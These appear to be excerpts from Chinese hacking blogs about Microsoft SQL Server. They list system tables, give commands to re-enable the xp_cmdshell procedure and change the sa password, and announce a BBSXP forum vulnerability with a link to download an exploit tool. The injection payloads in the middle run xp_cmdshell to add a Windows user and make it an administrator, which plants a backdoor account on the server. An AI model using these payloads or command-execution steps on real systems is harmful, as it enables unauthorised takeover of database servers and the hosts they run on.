来源:http://www.hoky.org/blog/
sysaltfiles 主数据库 保存数据库的文件
syscharsets 主数据库 字符集与排序顺序
sysconfigures 主数据库 配置选项
syscurconfigs 主数据库 当前配置选项
sysdatabases 主数据库 服务器中的数据库
syslanguages 主数据库 语言
syslogins 主数据库 登陆帐号信息
sysoledbusers 主数据库 链接服务器登陆信息
sysprocesses 主数据库 进程
sysremotelogins主数据库 远程登录帐号
syscolumns 每个数据库 列
sysconstrains 每个数据库 限制
sysfilegroups 每个数据库 文件组
sysfiles 每个数据库 文件
sysforeignkeys 每个数据库 外部关键字
sysindexs 每个数据库 索引
阅读全文 »
Tags: MSSQL
作者: lovezy 来源:http://www.wrsky.com/
用SQL连接器恢复XP_CMDSHLLE的命令
(1)SQL Query Analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
去除
sp_dropextendedproc 'xp_cmdshell'
(3)MSSQL2000
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
修改sa密码 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'
阅读全文 »
Tags: 3389,
MSSQL,
xp_cmdshell
;exec master..xp_cmdshell "net user name password /add"–
;exec master..xp_cmdshell "net localgroup administrators name /add"–
程序代码开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK
恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select 阅读全文 »
Tags: MSSQL,
SQL Server
bbsxp漏洞
by 臭要饭的!
漏洞于去年的一个下雨天,发现的.请大家还是不要使用本程序破坏国内主机,后果与作者无关.
本程序只对SQL版本有效,漏洞原理实用于ACCESS和SQL数据库。但是这里我们是要更改上传设置。
所以不讨论ACCESS数据库,也不想去跑什么MD5密码.一句话,该放弃的还是要放弃.做人不要太绝了.
[程序+动画下载]
http://www.hacker888.com/tools/BBSXPshell.rar
Tags: BBSXP,
Exploit,
MSSQL